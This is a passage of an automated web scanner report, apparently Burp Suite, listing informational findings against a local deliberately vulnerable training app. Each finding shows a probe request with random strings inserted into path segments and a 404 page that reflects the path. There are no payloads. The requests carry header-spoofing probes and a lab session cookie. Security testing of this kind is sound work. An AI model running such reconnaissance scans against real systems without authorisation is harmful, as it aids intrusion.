Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp98mneurhhl/source/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp98mneurhhl/source/jsonp was not found on this server.</p>
...[SNIP]...
19.147. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source99h4pgpjfw/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source99h4pgpjfw/jsonp was not found on this server.</p>
...[SNIP]...
19.148. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source/jsonp_impossible30zg3q1ojq HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source/jsonp_impossible30zg3q1ojq was not found on this server.</p>
...[SNIP]...
19.149. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste75m1i10yk6/vulnerabilities/csp/source/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste75m1i10yk6/vulnerabilities/csp/source/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.150. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesowknpq3zmj/csp/source/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesowknpq3zmj/csp/source/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.151. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/cspvecdz78jwr/source/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/cspvecdz78jwr/source/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.152. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp_impossible

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source21r1vwt89b/jsonp_impossible HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source21r1vwt89b/jsonp_impossible was not found on this server.</p>
...[SNIP]...
19.153. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieslf5kb1newi/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieslf5kb1newi/csrf/ was not found on this server.</p>
...[SNIP]...
19.154. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csrf8oaa0x8yns/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csrf8oaa0x8yns/ was not found on this server.</p>
...[SNIP]...
19.155. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/exec/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities0kkv2yrrwv/exec/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities0kkv2yrrwv/exec/ was not found on this server.</p>
...[SNIP]...
19.156. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/exec/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/execuctjom9lgy/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:49 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/execuctjom9lgy/ was not found on this server.</p>
...[SNIP]...
19.157. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities095kil8hpe/fi/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities095kil8hpe/fi/ was not found on this server.</p>
...[SNIP]...
19.158. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/figifzec5bai/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/figifzec5bai/ was not found on this server.</p>
...[SNIP]...
19.159. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieshxthb3ku2w/fi/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieshxthb3ku2w/fi/help/ was not found on this server.</p>
...[SNIP]...
19.160. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/fi3p8qr359ep/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/fi3p8qr359ep/help/ was not found on this server.</p>
...[SNIP]...
19.161. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/fi/help6ydm21h5ff/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/fi/help6ydm21h5ff/ was not found on this server.</p>
...[SNIP]...
19.162. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities4zg33cydw3/fi/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities4zg33cydw3/fi/source/ was not found on this server.</p>
...[SNIP]...
19.163. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/ficmlv0k0ths/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/ficmlv0k0ths/source/ was not found on this server.</p>
...[SNIP]...
19.164. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/fi/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/fi/source4hibzo76o8/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/fi/source4hibzo76o8/ was not found on this server.</p>
...[SNIP]...
19.165. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesjciby81m4r/javascript/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:30 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesjciby81m4r/javascript/ was not found on this server.</p>
...[SNIP]...
19.166. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascriptl5sduffr5c/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascriptl5sduffr5c/ was not found on this server.</p>
...[SNIP]...
19.167. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesexzhdxtty1/javascript/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesexzhdxtty1/javascript/help/ was not found on this server.</p>
...[SNIP]...
19.168. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascriptzd0lgbqfk5/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascriptzd0lgbqfk5/help/ was not found on this server.</p>
...[SNIP]...
19.169. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/javascript/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/javascript/helpf9w8tk7vfh/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/javascript/helpf9w8tk7vfh/ was not found on this server.</p>
...[SNIP]...
19.170. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
